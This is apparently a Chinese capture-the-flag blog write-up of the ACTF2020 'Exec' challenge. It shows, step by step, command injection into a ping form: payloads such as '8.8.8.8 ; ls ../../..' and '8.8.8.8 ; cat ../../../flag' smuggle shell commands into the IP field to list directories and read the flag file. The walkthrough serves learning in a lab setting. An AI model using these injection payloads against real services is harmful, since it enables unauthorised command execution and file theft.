[ACTF2020 新生赛]Exec
目录
[ACTF2020 新生赛]Exec
访问靶机:
输入8.8.8.8
,点击PING
输入8.8.8.8 & ipconfig
,从结果来看没有执行ipconfig
输入8.8.8.8 ; ifconfig
,从结果来看执行了ifconfig
对比以上两条命令可知:
- 该页面存在RCE漏洞
- 服务器为Linux系统
输入8.8.8.8 ; ls
,看到当前目录下只有一个index.php
输入8.8.8.8 ; ls ..
,也没找到flag文件
以此类推,一直往上级目录查询,直到输入8.8.8.8 ; ls ../../..
,找到flag文件
输入8.8.8.8 ; cat ../../../flag
,得到flag
当我站在传授他人的角度思考问题时
才能真正领悟并融会贯通
博客受益者是未来那个遗忘某个技术的自己